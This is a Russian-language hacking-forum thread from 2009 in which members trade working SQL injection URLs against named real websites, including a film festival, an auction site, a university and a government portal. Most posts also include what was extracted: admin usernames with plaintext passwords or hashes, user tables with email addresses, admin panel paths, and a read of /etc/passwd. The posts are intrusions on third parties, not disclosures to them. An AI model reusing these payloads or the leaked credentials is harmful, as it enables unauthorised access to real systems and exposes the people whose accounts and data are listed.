HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.02.2009, 18:13
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами: 9196401

Репутация: 930
По умолчанию

Welcome to the Jameson Dublin International Film Festival
Код:
http://www.jdiff.com/event_live.php?id=13'+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7/*
user(): IFFUSR@LOCALHOST
database(): DUBLINIFF_COM
version(): 5.0.27

PR=5
тИЦ=10

table test_admin:
Код:
http://www.jdiff.com/event_live.php?id=13'+union+select+1,2,concat(id,0x3a,username,0x3a,password),4,5,6,7+from+test_admin/*
Код HTML:
1:ADMIN:ADMINPWD1
table mcc004_user:
Код:
http://www.jdiff.com/event_live.php?id=13'+union+select+1,2,concat(id,0x3a,user_login,0x3a,user_pass),4,5,6,7+from+mcc004_wp_users/*
Код HTML:
1:ADMIN:$P$BWSEILDVQWFDR4VRWWLPQRYW3PCKEI.
2:ANDREW KENNEDY:$P$BXXUBZWP6V9NXGJFXCSR5F2RL5WRQG1
админка:
Код:
http://www.jdiff.com/admin/login.php


OSAS Stallion Auction
Код:
http://www.osasauction.com/item.php?id=-3+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
вывод в title

user(): peimatin_auct3@localhost
database(): peimatin_auct3
version(): 5.0.75-community-log

table PHPAUCTIONXL_adminusers:
Код HTML:
porchak:832d376cb74fb47ed113debe9b5f24d9
table PHPAUCTIONXL_users:
Код HTML:
1:jayport:bf6a89d3935ceb0ed798149d2ac967ed
2:auctionstaff:bf6a89d3935ceb0ed798149d2ac967ed
3:colt12:3e1f9e1da3b65fa102d3a6589bf409b6
4:Breeder:4160c64318079c955543d5a14ea3a27b
5:stefbo:bcea5fde6a21c943838b2d5a1784a2e4
6:chanthor:cda8b830510c5c1d0e55f8e147c374a7
7:jamesinc:c1a9eed41e121557ead9156201421d41
админка:
Код:
http://www.osasauction.com/admin/


Ocean City Golf - Golf Packages
Код:
http://www.ocgolf.com/packages/packagers.php?id=-13'+union+select+concat(user(),0x3a,database(),0x3a,version())/*
user(): golf@localhost
database(): golfdb
version(): 4.0.24-standard-log

PR=5
тИЦ=10

з.ы интересная sql inj
 
Ответить с цитированием

  #2  
Старый 13.02.2009, 18:33
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами: 9838057

Репутация: 302
По умолчанию

http://www.internationalfellowships.org.uk/host.php?host_id=-1%20union%20select%201,2,3,group_concat(table_name ),5,6,7,8,9%20from%20information_schema.tables--

5.0.67
 
Ответить с цитированием

  #3  
Старый 13.02.2009, 18:39
edichka
Новичок
Регистрация: 31.01.2009
Сообщений: 22
С нами: 9092536

Репутация: 34
По умолчанию

http://www.e-travel.ie

Код HTML:
http://www.e-travel.ie/sp_page.php?id=-11+union+select+1,2,3,4,concat_ws(0x3a3b,version(),database(),user()),6,7,8,9,0,1

5.0.45-log:;etravelertyu:;etravelusr@localhost


Пассы лимитом

http://www.e-travel.ie/sp_page.php?id=-11+union+select+1,2,3,4,concat_ws(0x3a,Admin_Name,Admin_Pass),6,7,8,9,0,1+from+Administrators+limit+0,1

Audrey:rUkhf.0RR7tNk

хэш доселе невиданый =)

Логинка

http://www.e-travel.ie/cruise_club_login.php
 
Ответить с цитированием

  #4  
Старый 13.02.2009, 19:07
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

http://www.rugby.ro/index.php?pag=pages&id=191+UNION+SELECT+1,2,concat _ws(0x3a,version(),database(),user()),4,5,6,7,8,9, 10,11+LIMIT+1,1--


Database Version: 5.0.26
Database name: rugby_ro2
User name: root@localhost




читаем

http://www.rugby.ro/index.php?pag=pages&id=191+UNION+SELECT+1,2,LOAD_F ILE(0x2F6574632F706173737764),4,5,6,7,8,9,10,11+LI MIT+1,1--



в скуле выводятся бд всех сайтов на хостинге

Последний раз редактировалось Gorev; 13.02.2009 в 19:10..
 
Ответить с цитированием

  #5  
Старый 13.02.2009, 19:13
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Код:
http://www.musicer.net/Live%20is%20life.php?sms_kod=-60546'/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
6.0.2-alpha-log
ыыы
 
Ответить с цитированием

  #6  
Старый 13.02.2009, 19:45
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами: 9116712

Репутация: 688
По умолчанию

Код:
http://www.sagu.edu/news/article.php?ID=9999999+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10,11--

Database Version : 4.1.21-standard
Database name : sagu_news
User name : root@192.168.0.2


берем админа:

Код:
http://www.sagu.edu/news/article.php?ID=9999999+union+select+1,concat_ ws(0x3a, user,password),3,4,5,6,7,8,9,10,11+from+mysql.user--
 
Ответить с цитированием

  #7  
Старый 13.02.2009, 21:19
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами: 10077446

Репутация: 1020


По умолчанию

www.russiatourism.ru PageRank: 6 тИЦ: 1800
Код HTML:
http://www.russiatourism.ru/?actionType=getCities&D=-1)+union+select+DISTINCT+concat(table_schema,'.',table_name,'=%3E',COLUMN_NAME,'%3Cbr%3E')+from+INFORMATION_SCHEMA.COLUMNS+--+
админку так и не нашел, может ее и нету.

wap.biz.mts.com.ua

Код HTML:
http://wap.biz.mts.com.ua/tr/rss-feeder?from=/4&pid=1&nid=-38189'+union+select+1,2,3,concat_ws(0x3A,user(),@@version,database()),5,6,7,8+--+
rescue01.gov.by
Код HTML:
http://rescue01.gov.by/news/show.news.cgi?id=-435+union+select+1,2,3,concat_ws(0x3A,user(),database(),version()),5/*
админка на басике авторизации .

Последний раз редактировалось AkyHa_MaTaTa; 13.02.2009 в 22:18..
 
Ответить с цитированием

  #8  
Старый 13.02.2009, 21:33
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами: 9644530

Репутация: 443
По умолчанию

Цитата:
http://www.circlemichigan.com/member.php?id=109777778840/**/uNiOn/**/seLeCt/**/1,2,3,concat_ws(0x3a,version(),user(),database()), 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27--

Database Version: 5.0.67-community
Database name: circlem_db
User name: circlem_webuser@localhost

/home/circlem/public_html/manager/obj/database/mysql.php


Цитата:
http://www.circlemichigan.com/member.php?id=109777778840+UNION+SELECT+1,2,3,AES_ DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(id, 0x3a,username,0x3a,hash,0x3a,access)+FROM+circlem_ db.users+LIMIT+5,1),0x3a),0x71),0x71),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7--
: 3 : root : 4c60d3c4867b2f1e6935165b4b68130e24276876 : a : 1 : {s:4:"root";b:1;}




Цитата:
http://www.janera.com/janera_words.php?id=140+union+select+1,2,concat_ws (0x3a,version(),user(),database()),4,5,6,7,8--

Database Version: 5.0.67-log
Database name: janera
User name: janera@patton.dreamhost.com


Цитата:
http://www.janera.com/janera_words.php?id=140+UNION+SELECT+1,2,AES_DECRY PT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(username ,0x3a,password,0x3a,email)+FROM+janera.nljr_bouser s+LIMIT+3,1),0x3a),0x71),0x71),4,5,6,7,8--

: Janera:janera : publisher@janera.com
: Farrah:Farrah : fsarafa@janera.com
: Hannah:hannah : hwallace@janera.com
: Tusha:Tusha : TYakovleva@JANERA.com
: Erin:Florio : eflorio@janera.com
: Allison DeFrees : Clementine:Adefrees@janera.com

Последний раз редактировалось spherics; 13.02.2009 в 21:42..
 
Ответить с цитированием

  #9  
Старый 13.02.2009, 21:54
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Код:
http://www.macbytes.com/mb.php?catdispid=-12+union+select+1,2,3,version(),5,6,7,8,9/*
5.0.22-log
 
Ответить с цитированием

  #10  
Старый 13.02.2009, 22:23
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами: 9129884

Репутация: 240
По умолчанию

http://www.innernet.org.il/printArticle.php?id=-197+union+select+1,2,3,4,5,6,version()/*

version() 4.0.16-log
database() innernet
user() innerdb@zeraim
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.